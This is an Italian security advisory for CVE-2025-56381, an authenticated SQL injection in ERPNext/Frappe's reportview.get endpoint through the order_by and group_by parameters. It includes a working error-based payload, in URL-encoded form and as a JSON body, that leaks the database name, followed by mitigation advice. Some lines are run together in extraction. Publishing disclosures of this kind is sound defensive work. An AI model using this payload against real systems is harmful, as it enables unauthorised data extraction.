
ERPNEXT v15.67.0 è stato scoperto contenere multiple vulnerabilità di SQL injection nell'endpoint /api/method/frappe.desk.reportview.get tramite i parametri order_by e group_by.
order_by e group_by📌 Sommario
ERPNext v15.67.0 e Frappe Framework v15.72.4 contengono molteplici vulnerabilità di SQL injection autenticata nell'endpoint API frappe.desk.reportview.get. Input dannosi ai parametri order_by o group_by possono essere utilizzati per iniettare ed eseguire istruzioni SQL arbitrarie. Ciò consente a un utente autenticato (con accesso di base ai report) di estrarre dati sensibili, eseguire enumerazione del database e potenzialmente manipolare o elevare i privilegi all'interno del sistema.
Tipo di Vulnerabilità: SQL Injection (CWE-89)
Prodotto(i) Interessato(i): ERPNext / Frappe
Versioni Interessate:
Endpoint Interessato:
POST /api/method/frappe.desk.reportview.get
Parametri Vulnerabili:
order_bygroup_byAutenticazione Richiesta: Sì (sessione valida tramite cookie sid)
Tipo di Attacco: Remoto
Gravità: Alta (esecuzione di codice SQL, esfiltrazione di dati, potenziale elevazione dei privilegi)
Punteggio CVSS v3.1 Stimato: 8.6 (Alto) — stima; il punteggio finale dovrebbe essere assegnato dall'autorità ufficiale CVE.
Stato: Non corretto (al momento della divulgazione)
ID CVE: CVE-2025-56381

✅ Testa solo su sistemi di cui sei proprietario o su cui hai esplicita autorizzazione a testare. Non utilizzare contro sistemi di produzione senza consenso.
%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29
{
"doctype": "User",
"order_by": "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
}
Ciò conferma che l'iniezione SQL è stata eseguita con successo e che il nome del database corrente è stato divulgato.
/api/method/frappe.desk.reportview.get con un payload dannoso in order_by o group_by.order_by e group_by rispetto a una allowlist nota di nomi di colonna accettabili prima dell'elaborazione./reportview.get e alle funzionalità dei report in base ai ruoli utente e ai livelli di fiducia.frappe.desk. Gli operatori dovrebbero aggiornare non appena una patch è disponibile.Scopritore: Mohammed Aloli
Frappe Framework: https://github.com/frappe/frappe
Progetto ERPNext: https://github.com/frappe/erpnext
OWASP SQL Injection Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Questa advisory è pubblicata esclusivamente a scopo educativo e di ricerca difensiva sulla sicurezza. Sfruttare questa vulnerabilità senza autorizzazione è illegale e non etico. Se sei uno sviluppatore o un amministratore di ERPNext o Frappe, applica immediatamente le mitigazioni raccomandate e monitora l'utilizzo anomalo delle API.